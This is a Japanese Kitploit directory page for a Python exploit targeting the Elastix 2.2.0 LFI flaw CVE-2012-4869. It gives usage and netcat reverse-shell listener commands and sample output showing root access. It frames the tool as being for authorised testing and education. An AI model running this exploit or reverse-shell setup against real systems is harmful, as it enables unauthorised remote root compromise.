Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Elastix-2.2.0-CVE-2012-4869 — Python製のエクスプロイトスクリプト。Elastix 2.2.0のLFI脆弱性(CVE-2012-4869)を悪用し、Perlリバースシェルペイロードの注入によるリモートコード実行を可能にします。 | Kitploit
ツール/GitHubGitHub/cyberdesu/elastix-2.2.0-cve-2012-4869
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubcyberdesu/elastix-2.2.0-cve-2012-4869

Elastix-2.2.0-CVE-2012-4869

Python製のエクスプロイトスクリプト。Elastix 2.2.0のLFI脆弱性(CVE-2012-4869)を悪用し、Perlリバースシェルペイロードの注入によるリモートコード実行を可能にします。

リポジトリを見る
61年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Elastix 2.2.0 ローカルファイルインクルードエクスプロイト - CVE-2012-4869

説明

このスクリプトは Elastix 2.2.0 のローカルファイルインクルード (LFI) 脆弱性を悪用し、callme_page.php エンドポイントを介してコマンドを注入することでリモートコード実行 (RCE) を可能にします。このエクスプロイトは CVE-2012-4869 に基づいています。

特徴

  • TLS 証明書の検証をバイパスします。
  • Perl リバースシェル ペイロードを使用します。
  • リバースシェル用のカスタム LHOST および LPORT をサポートします。
  • HTTPS セキュリティ警告を抑制します。

必要条件

  • Python 3
  • requests モジュール

次のコマンドで依存関係をインストールします:

pip install requests

使用方法

python exploit.py <URL> --LHOST <YOUR_IP> --LPORT <YOUR_PORT>

例:

python exploit.py "https://10.129.229.183" --LHOST "10.10.14.23" --LPORT 9001

リバースシェルリスナーのセットアップ

エクスプロイトを実行する前に、お使いのマシンで Netcat リスナー を開始してください:

nc -lvnp 9001

エクスプロイト実行出力

[*] Running Elastix 2.2.0 LFI Exploit - CVE-2012-4869
[*] Target: https://10.129.229.183
[*] Listening on 10.10.14.23:9001

[+] Exploit sent successfully, waiting for reverse shell...

[+] Connection from 10.129.229.183:41242
$ id
uid=0(root) gid=0(root) groups=0(root)

注意事項

  • リバースシェルが接続されない場合は、ファイアウォールルールとSELinux設定がアウトバウンド接続を許可していることを確認してください。
  • Perl が利用できない場合は、代替ペイロード (例: Bash や Python) を使用できます。
  • お使いの LHOST がターゲットマシンから到達可能であることを確認してください。

免責事項

このエクスプロイトは教育および許可されたセキュリティテスト目的のみに使用されます。無断使用は違法です。作者はこのツールの誤用について責任を負いません。

ツールをダウンロード